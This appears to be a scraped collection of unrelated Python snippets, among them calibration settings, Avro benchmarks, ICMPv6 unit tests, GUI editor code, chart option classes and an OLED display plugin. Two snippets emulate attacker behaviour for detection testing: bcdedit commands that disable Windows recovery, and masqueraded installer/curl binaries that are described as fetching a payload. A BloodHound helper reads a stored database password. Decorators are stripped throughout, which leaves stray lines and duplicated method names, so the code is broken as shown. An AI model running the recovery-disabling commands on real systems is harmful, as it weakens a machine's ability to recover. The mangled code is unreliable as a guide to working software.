hand_eye_config.prefilter_poses_enabled = False
hand_eye_config.prefilter_dot_product_threshold = 0.95
hand_eye_config.ransac_sample_size = 3
hand_eye_config.ransac_sample_rejection_scalar_part_equality_tolerance = 0.01
hand_eye_config.ransac_max_number_iterations = 20
hand_eye_config.ransac_enable_early_abort = True
hand_eye_config.ransac_outlier_probability = 0.5
hand_eye_config.ransac_success_probability_threshold = 0.99
hand_eye_config.ransac_inlier_classification = 'scalar_part_equality'
hand_eye_config.ransac_position_error_threshold_m = 0.02
hand_eye_config.ransac_orientation_error_threshold_deg = 1.0
hand_eye_config.ransac_model_refinement = True
hand_eye_config.ransac_evaluate_refined_model_on_inliers_only = False
hand_eye_config.hand_eye_calibration_scalar_part_equality_tolerance = 0.04
hand_eye_config.visualize = False
hand_eye_config.visualize_plot_every_nth_pose = 10
return (time_alignment_config, hand_eye_config) |
def read_schemaless(iostream, schema, num_records, runs):
schema = fastavro.parse_schema(schema)
schemaless_reader = fastavro.schemaless_reader
duration = timeit.repeat('iostream.seek(0);schemaless_reader(iostream, schema);', number=num_records, repeat=runs, globals=locals())
print(TIMEIT_FORMAT.format('read schemaless fastavro', num_records, runs, (min(duration) * 1000.0)))
iostream.seek(0)
return schemaless_reader(iostream, schema) |
def is_text(path, prob_lines=1000, probe_size=4096):
try:
with open(path, 'rb') as f:
if (0 in f.read(probe_size)):
return False
with open(path, 'r', encoding='utf-8') as f:
for (i, _) in enumerate(f):
if (i > prob_lines):
break
return True
except UnicodeDecodeError:
return False |
class ExtendedCodecsTest(unittest.TestCase):
def test_decode_mac_japanese(self):
self.assertEqual(b'x\xfe\xfdy'.decode('x_mac_japanese_ttx'), (((chr(120) + chr(8482)) + chr(169)) + chr(121)))
def test_encode_mac_japanese(self):
self.assertEqual(b'x\xfe\xfdy', (((chr(120) + chr(8482)) + chr(169)) + chr(121)).encode('x_mac_japanese_ttx'))
def test_decode_mac_trad_chinese(self):
self.assertEqual(b'\x80'.decode('x_mac_trad_chinese_ttx'), chr(92))
def test_decode_mac_romanian(self):
self.assertEqual(b'x\xfb'.decode('mac_romanian'), (chr(120) + chr(730))) |
def compute_eigvals_eigvecs(score: Tensor, node_val: Tensor) -> Tuple[(bool, Tensor, Tensor, Tensor)]:
(first_gradient, hessian) = tensorops.gradients(score, node_val)
is_valid_first_grad_and_hessian = (is_valid(first_gradient) or is_valid(hessian))
if (not is_valid_first_grad_and_hessian):
return (False, tensor(0.0), tensor(0.0), tensor(0.0))
neg_hessian = ((- 1) * hessian.detach())
(eig_vecs, eig_vals) = soft_abs_inverse(neg_hessian)
return (True, first_gradient, eig_vecs, eig_vals) |
class GamePad(Input, Output):
def get_gampad_count():
return pygame.joystick.get_count()
def __init__(self, gamepad_id, track_button_events=True, track_motion_events=False):
if (not _internals.active_exp.is_initialized):
raise RuntimeError('Cannot create GamePad before expyriment.initialize()!')
Input.__init__(self)
Output.__init__(self)
self.track_button_events = track_button_events
self.track_motion_events = track_motion_events
self._joystick = pygame.joystick.Joystick(gamepad_id)
self._joystick.init()
def track_button_events(self):
return self._track_button_events
_button_events.setter
def track_button_events(self, value):
self._track_button_events = value
if value:
pygame.event.set_allowed(pygame.JOYBUTTONDOWN)
pygame.event.set_allowed(pygame.JOYBUTTONUP)
else:
pygame.event.set_blocked(pygame.JOYBUTTONDOWN)
pygame.event.set_blocked(pygame.JOYBUTTONUP)
def track_motion_events(self):
return self._track_motion_events
_motion_events.setter
def track_motion_events(self, value):
self._track_motion_events = value
if value:
pygame.event.set_allowed(pygame.JOYAXISMOTION)
pygame.event.set_allowed(pygame.JOYBALLMOTION)
pygame.event.set_allowed(pygame.JOYHATMOTION)
else:
pygame.event.set_blocked(pygame.JOYAXISMOTION)
pygame.event.set_blocked(pygame.JOYBALLMOTION)
pygame.event.set_blocked(pygame.JOYHATMOTION)
def id(self):
return self._joystick.get_id()
def name(self):
return self._joystick.get_name()
def joystick(self):
return self._joystick
def get_numaxes(self):
return self._joystick.get_numaxes()
def get_axis(self, axis):
pygame.event.pump()
return self._joystick.get_axis(axis)
def get_numballs(self):
return self._joystick.get_numballs()
def get_ball(self, ball):
pygame.event.pump()
return self._joystick.get_ball(ball)
def get_numbuttons(self):
return self._joystick.get_numbuttons()
def get_button(self, button):
pygame.event.pump()
return self._joystick.get_button(button)
def get_numhats(self):
return self._joystick.get_numhats()
def get_hat(self, hat):
pygame.event.pump()
return self._joystick.get_hat(hat)
def clear(self):
pygame.event.clear(pygame.JOYBUTTONDOWN)
pygame.event.clear(pygame.JOYBUTTONUP)
pygame.event.clear(pygame.JOYAXISMOTION)
pygame.event.clear(pygame.JOYBALLMOTION)
pygame.event.clear(pygame.JOYHATMOTION)
if self._logging:
_internals.active_exp._event_file_log('GamePad,cleared', 2)
def wait_press(self, buttons=None, duration=None, callback_function=None, process_control_events=True):
if _internals.skip_wait_methods:
return (None, None)
start = get_time()
rt = None
_button = None
self.clear()
if (buttons is None):
buttons = list(range(self.get_numbuttons()))
try:
buttons = list(buttons)
except Exception:
buttons = [buttons]
done = False
while (not done):
if isinstance(callback_function, FunctionType):
rtn_callback = callback_function()
if isinstance(rtn_callback, _internals.CallbackQuitEvent):
_button = rtn_callback
rt = int(((get_time() - start) * 1000))
done = True
if _internals.active_exp.is_initialized:
rtn_callback = _internals.active_exp._execute_wait_callback()
if isinstance(rtn_callback, _internals.CallbackQuitEvent):
_button = rtn_callback
rt = int(((get_time() - start) * 1000))
done = True
if process_control_events:
if (_internals.active_exp.mouse.process_quit_event() or _internals.active_exp.keyboard.process_control_keys()):
done = True
for button in buttons:
if self.get_button(button):
_button = button
rt = int(((get_time() - start) * 1000))
done = True
break
if (_button is not None):
done = True
break
if duration:
if (int(((get_time() - start) * 1000)) >= duration):
done = True
break
if self._logging:
_internals.active_exp._event_file_log('Gamepad,received,{0},wait_press'.format(_button))
return (_button, rt) |
class Test_icmpv6_echo_request(unittest.TestCase):
type_ = 128
code = 0
csum = 42354
id_ = 30240
seq = 0
data = b'\x01\xc9\xe76\xd39\x06\x00'
buf = b'\x80\x00\xa5rv \x00\x00'
def setUp(self):
pass
def tearDown(self):
pass
def test_init(self):
echo = icmpv6.echo(0, 0)
eq_(echo.id, 0)
eq_(echo.seq, 0)
eq_(echo.data, None)
def _test_parser(self, data=None):
buf = (self.buf + (data or b''))
(msg, n, _) = icmpv6.icmpv6.parser(buf)
eq_(msg.type_, self.type_)
eq_(msg.code, self.code)
eq_(msg.csum, self.csum)
eq_(msg.data.id, self.id_)
eq_(msg.data.seq, self.seq)
eq_(msg.data.data, data)
eq_(n, None)
def test_parser_without_data(self):
self._test_parser()
def test_parser_with_data(self):
self._test_parser(self.data)
def _test_serialize(self, echo_data=None):
buf = (self.buf + (echo_data or b''))
src_ipv6 = '3ffe:507:0:1:200:86ff:fe05:80da'
dst_ipv6 = '3ffe:501:0:1001::2'
prev = ipv6(6, 0, 0, len(buf), 64, 255, src_ipv6, dst_ipv6)
echo_csum = icmpv6_csum(prev, buf)
echo = icmpv6.echo(self.id_, self.seq, echo_data)
icmp = icmpv6.icmpv6(self.type_, self.code, 0, echo)
buf = six.binary_type(icmp.serialize(bytearray(), prev))
(type_, code, csum) = struct.unpack_from(icmp._PACK_STR, buf, 0)
(id_, seq) = struct.unpack_from(echo._PACK_STR, buf, icmp._MIN_LEN)
data = buf[(icmp._MIN_LEN + echo._MIN_LEN):]
data = (data if (len(data) != 0) else None)
eq_(type_, self.type_)
eq_(code, self.code)
eq_(csum, echo_csum)
eq_(id_, self.id_)
eq_(seq, self.seq)
eq_(data, echo_data)
def test_serialize_without_data(self):
self._test_serialize()
def test_serialize_with_data(self):
self._test_serialize(self.data)
def test_to_string(self):
ec = icmpv6.echo(self.id_, self.seq, self.data)
ic = icmpv6.icmpv6(self.type_, self.code, self.csum, ec)
echo_values = {'id': self.id_, 'seq': self.seq, 'data': self.data}
_echo_str = ','.join([('%s=%s' % (k, repr(echo_values[k]))) for (k, v) in inspect.getmembers(ec) if (k in echo_values)])
echo_str = ('%s(%s)' % (icmpv6.echo.__name__, _echo_str))
icmp_values = {'type_': repr(self.type_), 'code': repr(self.code), 'csum': repr(self.csum), 'data': echo_str}
_ic_str = ','.join([('%s=%s' % (k, icmp_values[k])) for (k, v) in inspect.getmembers(ic) if (k in icmp_values)])
ic_str = ('%s(%s)' % (icmpv6.icmpv6.__name__, _ic_str))
eq_(str(ic), ic_str)
eq_(repr(ic), ic_str)
def test_default_args(self):
prev = ipv6(nxt=inet.IPPROTO_ICMPV6)
ic = icmpv6.icmpv6(type_=icmpv6.ICMPV6_ECHO_REQUEST, data=icmpv6.echo())
prev.serialize(ic, None)
buf = ic.serialize(bytearray(), prev)
res = struct.unpack(icmpv6.icmpv6._PACK_STR, six.binary_type(buf[:4]))
eq_(res[0], icmpv6.ICMPV6_ECHO_REQUEST)
eq_(res[1], 0)
eq_(res[2], icmpv6_csum(prev, buf))
res = struct.unpack(icmpv6.echo._PACK_STR, six.binary_type(buf[4:]))
eq_(res[0], 0)
eq_(res[1], 0)
def test_json(self):
ec = icmpv6.echo(self.id_, self.seq, self.data)
ic1 = icmpv6.icmpv6(self.type_, self.code, self.csum, ec)
jsondict = ic1.to_jsondict()
ic2 = icmpv6.icmpv6.from_jsondict(jsondict['icmpv6'])
eq_(str(ic1), str(ic2)) |
class MessageStorageItem(StorageItem):
def identifier(self) -> MessageIdentifier:
return self._id
def __init__(self, conv_uid: str, index: int, message_detail: Dict):
self.conv_uid = conv_uid
self.index = index
self.message_detail = message_detail
self._id = MessageIdentifier(conv_uid, index)
def to_dict(self) -> Dict:
return {'conv_uid': self.conv_uid, 'index': self.index, 'message_detail': self.message_detail}
def to_message(self) -> BaseMessage:
return _message_from_dict(self.message_detail)
def merge(self, other: 'StorageItem') -> None:
if (not isinstance(other, MessageStorageItem)):
raise ValueError(f'Can not merge {other} to {self}')
self.message_detail = other.message_detail |
def get_searcher(args, mode, data_path):
searcher = None
if (mode in [SEARCH_MODE_NO_SEARCH, SEARCH_MODE_CACHE]):
searcher = None
elif (mode == SEARCH_MODE_DIAMOND):
searcher = DiamondSearcher(args, get_eggnog_dmnd_db(args.dmnd_db, mode, data_path))
elif (mode == SEARCH_MODE_HMMER):
searcher = HmmerSearcher(args)
elif (mode == SEARCH_MODE_MMSEQS2):
searcher = MMseqs2Searcher(args)
elif (mode == SEARCH_MODE_NOVEL_FAMS):
searcher = DiamondSearcher(args, get_eggnog_dmnd_db(args.dmnd_db, mode, data_path))
else:
raise EmapperException(('Unknown search mode %s' % mode))
return searcher |
class OptionPlotoptionsBarSonificationDefaultinstrumentoptionsMappingPlaydelay(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
('\n{out_data} = _mm256_blendv_pd ({z_data}, {y_data},\n_mm256_cmp_pd ({x_data}, {v_data}, _CMP_LT_OQ));\n')
def avx2_select_pd(out: ([f64][4] AVX2), x: ([f64][4] AVX2), v: ([f64][4] AVX2), y: ([f64][4] AVX2), z: ([f64][4] AVX2)):
assert (stride(out, 0) == 1)
assert (stride(x, 0) == 1)
assert (stride(v, 0) == 1)
assert (stride(y, 0) == 1)
assert (stride(z, 0) == 1)
for i in seq(0, 4):
out[i] = select(x[i], v[i], y[i], z[i]) |
class OptionSeriesColumnrangeSonificationDefaultspeechoptionsMappingRate(Options):
def mapFunction(self):
return self._config_get(None)
def mapFunction(self, value: Any):
self._config(value, js_type=False)
def mapTo(self):
return self._config_get(None)
def mapTo(self, text: str):
self._config(text, js_type=False)
def max(self):
return self._config_get(None)
def max(self, num: float):
self._config(num, js_type=False)
def min(self):
return self._config_get(None)
def min(self, num: float):
self._config(num, js_type=False)
def within(self):
return self._config_get(None)
def within(self, value: Any):
self._config(value, js_type=False) |
class Origin(NamedTuple):
callee_name: Method
callee_port: Port
def from_json(leaf_json: Dict[(str, Any)], leaf_kind: str) -> 'Origin':
callee = leaf_json.get('method', leaf_json.get('field', leaf_json.get('canonical_name')))
if (not callee):
raise sapp.ParseError(f'No callee found in origin {leaf_json}.')
callee_name = Method.from_json(callee)
callee_port = Port.from_json('leaf', leaf_kind)
if ('canonical_name' in leaf_json):
callee_port = Port.from_json(leaf_json['port'], leaf_kind)
if (not callee_port.is_leaf()):
raise sapp.ParseError(f'Encountered non-leaf port in origin {leaf_json}')
return Origin(callee_name, callee_port) |
def detect_db_config():
system = platform.system()
if (system == 'Windows'):
try:
directory = os.environ['APPDATA']
except KeyError:
return (None, None)
config = os.path.join(directory, 'BloodHound', 'config.json')
try:
with open(config, 'r') as configfile:
configdata = json.load(configfile)
except IOError:
return (None, None)
if (system == 'Linux'):
try:
directory = os.environ['XDG_CONFIG_HOME']
except KeyError:
try:
directory = os.path.join(os.environ['HOME'], '.config')
except KeyError:
return (None, None)
config = os.path.join(directory, 'bloodhound', 'config.json')
try:
with open(config, 'r') as configfile:
configdata = json.load(configfile)
except IOError:
return (None, None)
if (system == 'Darwin'):
try:
directory = os.path.join(os.environ['HOME'], 'Library', 'Application Support')
except KeyError:
return (None, None)
config = os.path.join(directory, 'bloodhound', 'config.json')
try:
with open(config, 'r') as configfile:
configdata = json.load(configfile)
except IOError:
return (None, None)
try:
username = configdata['databaseInfo']['user']
except KeyError:
username = 'neo4j'
try:
password = configdata['databaseInfo']['password']
except KeyError:
password = None
return (username, password) |
(IPythonEditor)
class PythonEditor(MPythonEditor, LayoutWidget):
dirty = Bool(False)
path = Str()
show_line_numbers = Bool(True)
changed = Event()
key_pressed = Event(KeyPressedEvent)
def __init__(self, parent=None, **traits):
create = traits.pop('create', None)
super().__init__(parent=parent, **traits)
if create:
self.create()
warnings.warn('automatic widget creation is deprecated and will be removed in a future Pyface version, code should not pass the create parameter and should instead call create() explicitly', DeprecationWarning, stacklevel=2)
elif (create is not None):
warnings.warn('setting create=False is no longer required', DeprecationWarning, stacklevel=2)
def load(self, path=None):
if (path is None):
path = self.path
if (len(path) > 0):
f = open(self.path, 'r')
text = f.read()
f.close()
else:
text = ''
self.control.SetText(text)
self.dirty = False
def save(self, path=None):
if (path is None):
path = self.path
f = open(path, 'w')
f.write(self.control.GetText())
f.close()
self.dirty = False
def set_style(self, n, fore, back):
self.control.StyleSetForeground(n, fore)
self.control.StyleSetBackground(n, back)
self.control.StyleSetFaceName(n, 'courier new')
self.control.StyleSetSize(n, faces['size'])
def select_line(self, lineno):
start = self.control.PositionFromLine(lineno)
end = self.control.GetLineEndPosition(lineno)
self.control.SetSelection(start, end)
return
def _path_changed(self):
self._changed_path()
return
def _create_control(self, parent):
self.control = stc = PythonSTC(parent, (- 1))
stc.SetProperty('fold', '0')
stc.SetEdgeMode(wx.stc.STC_EDGE_LINE)
stc.SetEdgeColumn(79)
if self.show_line_numbers:
stc.SetMarginType(1, wx.stc.STC_MARGIN_NUMBER)
stc.SetMarginWidth(1, 45)
self.set_style(wx.stc.STC_STYLE_LINENUMBER, '#000000', '#c0c0c0')
else:
stc.SetMarginWidth(1, 4)
self.set_style(wx.stc.STC_STYLE_LINENUMBER, '#ffffff', '#ffffff')
stc.SetUseTabs(False)
stc.SetIndent(4)
stc.SetEOLMode(wx.stc.STC_EOL_LF)
self.set_style(wx.stc.STC_STYLE_DEFAULT, '#000000', '#ffffff')
self.set_style(wx.stc.STC_STYLE_CONTROLCHAR, '#000000', '#ffffff')
self.set_style(wx.stc.STC_STYLE_BRACELIGHT, '#000000', '#ffffff')
self.set_style(wx.stc.STC_STYLE_BRACEBAD, '#000000', '#ffffff')
self.set_style(wx.stc.STC_P_DEFAULT, '#000000', '#ffffff')
self.set_style(wx.stc.STC_P_COMMENTLINE, '#007f00', '#ffffff')
self.set_style(wx.stc.STC_P_NUMBER, '#007f7f', '#ffffff')
self.set_style(wx.stc.STC_P_STRING, '#7f007f', '#ffffff')
self.set_style(wx.stc.STC_P_CHARACTER, '#7f007f', '#ffffff')
self.set_style(wx.stc.STC_P_WORD, '#00007f', '#ffffff')
self.set_style(wx.stc.STC_P_TRIPLE, '#7f0000', '#ffffff')
self.set_style(wx.stc.STC_P_TRIPLEDOUBLE, '#ff0000', '#ffffff')
self.set_style(wx.stc.STC_P_CLASSNAME, '#0000ff', '#ffffff')
self.set_style(wx.stc.STC_P_DEFNAME, '#007f7f', '#ffffff')
self.set_style(wx.stc.STC_P_OPERATOR, '#000000', '#ffffff')
self.set_style(wx.stc.STC_P_IDENTIFIER, '#000000', '#ffffff')
self.set_style(wx.stc.STC_P_COMMENTBLOCK, '#007f00', '#ffffff')
self.set_style(wx.stc.STC_P_STRINGEOL, '#000000', '#ffffff')
stc.SetModEventMask((((wx.stc.STC_MOD_INSERTTEXT | wx.stc.STC_MOD_DELETETEXT) | wx.stc.STC_PERFORMED_UNDO) | wx.stc.STC_PERFORMED_REDO))
stc.Bind(wx.stc.EVT_STC_CHANGE, self._on_stc_changed)
stc.Bind(wx.EVT_CHAR, self._on_char)
self.load()
return stc
def destroy(self):
if (self.control is not None):
self.control.Unbind(wx.stc.EVT_STC_CHANGE)
self.control.Unbind(wx.EVT_CHAR)
super().destroy()
def _on_stc_changed(self, event):
self.dirty = True
self.changed = True
event.Skip()
def _on_char(self, event):
self.key_pressed = KeyPressedEvent(alt_down=event.altDown, control_down=event.controlDown, shift_down=event.shiftDown, key_code=event.KeyCode, event=event)
event.Skip()
return |
def load_environment_backend(env_backend: str) -> BackendAPI:
if (env_backend in SUPPORTED_BACKENDS):
try:
return load_backend(env_backend)
except ImportError as e:
raise ImportError(f"""The backend specified in ETH_HASH_BACKEND, '{env_backend}', is not installed. Install with `python -m pip install "eth-hash[{env_backend}]"`.""") from e
else:
raise ValueError(f"The backend specified in ETH_HASH_BACKEND, '{env_backend}', is not supported. Choose one of: {SUPPORTED_BACKENDS}") |
def confirm_email(nonce):
form = Form.confirm(nonce)
if (not form):
return (render_template('error.html', title='Not a valid link', text='Confirmation token not found.<br />Please check the link and try again.'), 400)
else:
return render_template('forms/email_confirmed.html', email=form.email, host=form.host) |
class OptionPlotoptionsHeatmapOnpointConnectoroptions(Options):
def dashstyle(self):
return self._config_get(None)
def dashstyle(self, text: str):
self._config(text, js_type=False)
def stroke(self):
return self._config_get(None)
def stroke(self, text: str):
self._config(text, js_type=False)
def width(self):
return self._config_get(1)
def width(self, num: float):
self._config(num, js_type=False) |
def find_uncategorized_dataset_fields(existing_dataset: Optional[Dataset], source_dataset: Dataset) -> Tuple[(List[str], int)]:
uncategorized_fields = []
total_field_count = 0
for source_dataset_collection in source_dataset.collections:
existing_dataset_collection = (next((existing_dataset_collection for existing_dataset_collection in existing_dataset.collections if (existing_dataset_collection.name == source_dataset_collection.name)), None) if existing_dataset else None)
for db_dataset_field in source_dataset_collection.fields:
total_field_count += 1
field_uncategorized = (all((((field.name != db_dataset_field.name) or (not field.data_categories)) for field in existing_dataset_collection.fields)) if existing_dataset_collection else True)
if field_uncategorized:
uncategorized_fields.append(f'{source_dataset.name}.{source_dataset_collection.name}.{db_dataset_field.name}')
return (uncategorized_fields, total_field_count) |
class batched_nms(Operator):
def __init__(self, iou_threshold=0.5, keep_n=(- 1)) -> None:
super().__init__()
self._attrs['op'] = 'batched_nms'
self._attrs['has_profiler'] = False
self._attrs['keep_n'] = keep_n
self._attrs['iou_threshold'] = iou_threshold
self.exec_key_template = EXEC_KEY_TEMPLATE
def _infer_shape(self, x: List[int]):
return [x[0]]
def _infer_shapes(self, x: Tensor):
x_shape_values = [var._attrs['values'] for var in x._attrs['shape']]
x_shapes = itertools.product(*x_shape_values)
y_shapes = []
for x_shape in x_shapes:
y_shape = self._infer_shape(x_shape)
y_shapes.append(y_shape)
def unique(vector):
return sorted(set(vector))
output_shape = []
for idx in range(len(y_shapes[0])):
output_shape.append(shape_utils.gen_int_var(values=unique([d[idx] for d in y_shapes])))
return output_shape
def __call__(self, x: Tensor) -> Tensor:
self._attrs['inputs'] = [x]
self._set_depth()
output_shape = self._infer_shapes(x)
output = Tensor(output_shape, src_ops={self}, dtype='int64')
boxes_num = x._attrs['shape'][0]._attrs['values'][0]
col_blocks = int((((boxes_num + 64) - 1) / 64))
tmp_space = (col_blocks * boxes_num)
tmp_c = _create_host_zero_tensor([IntImm(tmp_space)], dst_ops={self}, dtype='int64')
self._attrs['inputs'].append(tmp_c)
self._attrs['outputs'] = [output]
return output
def _get_op_attributes(self):
return {'iou_threshold': self._attrs['iou_threshold'], 'keep_n': self._attrs['keep_n']}
def gen_function(self) -> str:
target = backend.target.Target.current()
func_key = '{target}.{op}.gen_function'.format(target=target.name(), op=self._attrs['op'])
func = registry.get(func_key)
return func(self._attrs) |
def data_cmap(data: pd.Series) -> Tuple:
data_family = infer_data_family(data)
if (data_family == 'categorical'):
base_cmap = qualitative
num_categories = max(len(data.unique()), 3)
if (num_categories > 12):
raise ValueError(f"It appears you have >12 categories for the key {data.name}. Because it's difficult to discern >12 categories, and because colorbrewer doesn't have a qualitative colormap with greater than 12 categories, nxviz does not support plotting with >12 categories.")
cmap = ListedColormap(base_cmap.__dict__[f'Set3_{num_categories}'].mpl_colors)
elif (data_family == 'ordinal'):
cmap = get_cmap('viridis')
elif (data_family == 'continuous'):
cmap = get_cmap('viridis')
elif (data_family == 'divergent'):
cmap = get_cmap('bwr')
return (cmap, data_family) |
def _derive_pbkdf_key(crypto: Dict[(str, Any)], password: str) -> bytes:
kdf_params = crypto['kdfparams']
salt = decode_hex(kdf_params['salt'])
dklen = kdf_params['dklen']
(should_be_hmac, _, hash_name) = kdf_params['prf'].partition('-')
assert (should_be_hmac == 'hmac')
iterations = kdf_params['c']
derive_pbkdf_key = _pbkdf2_hash(password, hash_name, salt, iterations, dklen)
return derive_pbkdf_key |
def extractBluebugsstory(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return False
if ('WATTT' in item['tags']):
return buildReleaseMessageWithType(item, 'WATTT', vol, chp, frag=frag, postfix=postfix)
return False |
_os(*metadata.platforms)
def main():
common.log('Exporting the boot configuration....')
bcdedit = 'bcdedit.exe'
backup_file = Path('boot.cfg').resolve()
common.execute(['bcdedit.exe', '/export', backup_file])
common.log('Changing boot configuration', log_type='!')
common.execute([bcdedit, '/set', '{current}', 'bootstatuspolicy', 'ignoreallfailures'])
common.execute([bcdedit, '/set', '{current}', 'recoveryenabled', 'no'])
common.log(('Restoring boot configuration from %s' % backup_file), log_type='-')
common.execute([bcdedit, '/import', backup_file]) |
class Calendar(Html.Html):
name = 'ToastCalendar'
requirements = ('tui-calendar',)
_option_cls = OptToastCalendar.OptionCalendar
def __init__(self, page, width, height, html_code, options, profile):
self.height = height[0]
super(Calendar, self).__init__(page, [], html_code=html_code, profile=profile, options=options, css_attrs={'width': width, 'height': height})
self.options.height = height[0]
def var(self):
return ("window['%s']" % self.htmlCode)
def options(self) -> OptToastCalendar.OptionCalendar:
return super().options
def js(self) -> JsToastCalendar.Calendar:
if (self._js is None):
self._js = JsToastCalendar.Calendar(component=self, js_code=self.var, page=self.page)
return self._js
_js__builder__ = 'window[htmlObj.id] = new tui.Calendar(htmlObj, options)'
def __str__(self):
self.page.properties.js.add_builders(self.build())
return ('<div %(attrs)s></div>' % {'attrs': self.get_attrs(css_class_names=self.style.get_classes())}) |
_os(*metadata.platforms)
def main():
masquerade = '/tmp/Installer'
masquerade2 = '/tmp/curl'
common.create_macos_masquerade(masquerade)
common.create_macos_masquerade(masquerade2)
common.log('Launching fake macOS installer commands to download payload')
common.execute([masquerade], timeout=10, kill=True)
command = f'{masquerade2} test.amazonaws.comtest '
common.execute([masquerade, 'childprocess', command], timeout=10, kill=True)
common.remove_file(masquerade)
common.remove_file(masquerade2) |
def extractCabnovelsWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
if ('xi ling empire' in item['tags']):
return buildReleaseMessageWithType(item, 'Xyrin Empire', vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith('XE '):
return buildReleaseMessageWithType(item, 'Xyrin Empire', vol, chp, frag=frag, postfix=postfix)
if item['title'].startswith('(Ch.'):
return buildReleaseMessageWithType(item, 'Xyrin Empire', vol, chp, frag=frag, postfix=postfix)
return False |
class TestContest(object):
def testContest(self):
env = Environ()
t = EventTap()
s = env.server_core()
proton = env.client_core()
(a, b, c, d, e) = [env.client_core() for _ in range(5)]
t.tap(proton, a, b, c, d, e)
proton.auth.login('Proton')
a.auth.login('Alice')
b.auth.login('Bob')
c.auth.login('Cirno')
e.auth.login('Eirin')
wait()
assert (proton.auth.pid == 2)
assert (a.auth.pid > 0)
assert (b.auth.pid > 0)
assert (c.auth.pid > 0)
assert (e.auth.pid > 0)
proton.contest.setup('TestContest', 'THBattle2v2', [a.auth.pid, b.auth.pid])
wait()
assert (t.take(proton.events.server_error) == 'wrong_players_count')
assert (a.events.game_joined not in t)
assert (b.events.game_joined not in t)
b.room.create('Wow', 'THBattleNewbie', {})
wait()
s.observe.add_bigbrother(c.auth.pid)
b.room.get_ready()
c.observe.observe(b.auth.pid)
wait()
assert (b.events.game_started in t)
assert (c.events.game_started in t)
t.clear()
proton.contest.setup('TestContest', 'THBattleDummy4', ([i.auth.pid for i in (a, b, c)] + [s.backend.pid_of('Daiyousei')]))
wait()
assert (a.events.game_joined in t)
assert (b.events.game_joined not in t)
assert (c.events.game_joined in t)
assert (d.events.game_joined not in t)
assert (e.events.game_joined not in t)
d.auth.login('Daiyousei')
wait()
gevent.sleep(0.02)
assert (d.events.game_joined in t)
b.room.leave()
wait()
gevent.sleep(0.02)
assert (b.events.game_joined in t)
gid = a.game.gid_of(t[a.events.game_joined])
e.room.join(gid)
wait()
assert (t.take(e.events.server_error) == 'not_competitor')
t.clear()
a.room.get_ready()
b.room.get_ready()
c.room.get_ready()
d.room.get_ready()
wait() |
class Test_SlidingWindow():
def test_constructor(self):
x = SlidingWindow(10.1, 20.2, 30.3)
assert (x.before == 10.1)
assert (x.after == 20.2)
assert (x.expires == 30.3)
def test_has_ranges_including_the_value(self):
size = 10
step = 5
timestamp = 6
window = SlidingWindow(size, step, 30)
window_ranges = window.ranges(timestamp)
assert (len(window_ranges) == 1)
for range in window_ranges:
assert (range[0] <= timestamp)
assert (range[1] > timestamp)
def test_current_range_is_latest_range(self):
size = 57
step = 23
timestamp = 456
window = SlidingWindow(size, step, 30)
ranges = window.ranges(timestamp)
current_range = window.current(timestamp)
assert (current_range == ranges[(- 1)])
def test_earliest_range_is_first_range(self):
size = 100
step = 15
timestamp = 3223
window = SlidingWindow(size, step, 30)
ranges = window.ranges(timestamp)
earliest_range = window.earliest(timestamp)
assert (earliest_range == ranges[0])
def test_non_stale_timestamp(self):
size = 10
step = 5
expires = 20
now_timestamp = 60
window = SlidingWindow(size, step, expires)
for time in range(((now_timestamp - expires) + 1), now_timestamp):
assert (window.stale(time, now_timestamp) is False)
def test_delta(self):
size = 10
step = 5
expires = 20
now_timestamp = 60
window = SlidingWindow(size, step, expires)
assert (window.delta(now_timestamp, 30) == (20, 35))
def test_stale_timestamp(self):
size = 10
step = 5
expires = 20
now_timestamp = 60
window = SlidingWindow(size, step, expires)
for time in range(0, (now_timestamp - expires)):
print(f'TIME: {time} NOW TIMESTAMP: {now_timestamp}')
assert (window.stale(time, now_timestamp) is True) |
def annotate_pips_speed_model(pips, speed_data):
for (pip_name, pip_data) in pips.items():
speed_model_index = pip_data['speed_model_index']
pip_speed_data = speed_data[speed_model_index]
assert (pip_speed_data['resource_name'] == 'pip'), (pip_speed_data['resource_name'], speed_model_index)
pips[pip_name]['is_pass_transistor'] = pip_speed_data['is_pass_transistor']
pips[pip_name]['src_to_dst'] = {'delay': pip_speed_data.get('forward_delay', None), 'in_cap': pip_speed_data.get('forward_in_cap', None), 'res': pip_speed_data.get('forward_res', None)}
pips[pip_name]['dst_to_src'] = {'delay': pip_speed_data.get('reverse_delay', None), 'in_cap': pip_speed_data.get('reverse_in_cap', None), 'res': pip_speed_data.get('reverse_res', None)}
del pips[pip_name]['speed_model_index'] |
def register(blueprint: DashBlueprint, name: str, prefix=None, **kwargs):
if (prefix is not None):
prefix_transform = PrefixIdTransform(prefix)
blueprint.transforms.append(prefix_transform)
blueprint.register_callbacks(GLOBAL_BLUEPRINT)
dash.register_page(name, layout=blueprint._layout_value, **kwargs) |
class Plugin(plugin.PluginProto):
PLUGIN_ID = 23
PLUGIN_NAME = 'Display - Simple OLED'
PLUGIN_VALUENAME1 = 'OLED'
P23_Nlines = 8
def __init__(self, taskindex):
plugin.PluginProto.__init__(self, taskindex)
self.dtype = rpieGlobals.DEVICE_TYPE_I2C
self.vtype = rpieGlobals.SENSOR_TYPE_NONE
self.ports = 0
self.valuecount = 0
self.senddataoption = False
self.timeroption = True
self.timeroptional = True
self.formulaoption = False
self.device = None
self.width = None
self.height = None
self.lines = []
self.ufont = None
self.lineheight = 11
self.charwidth = 8
self.dispimage = None
def plugin_init(self, enableplugin=None):
plugin.PluginProto.plugin_init(self, enableplugin)
if self.enabled:
try:
i2cl = self.i2c
except:
i2cl = (- 1)
try:
i2cport = gpios.HWPorts.geti2clist()
if (i2cl == (- 1)):
i2cl = int(i2cport[0])
except:
i2cport = []
if ((len(i2cport) > 0) and (i2cl > (- 1))):
if (self.interval > 2):
nextr = (self.interval - 2)
else:
nextr = self.interval
self.initialized = False
serialdev = None
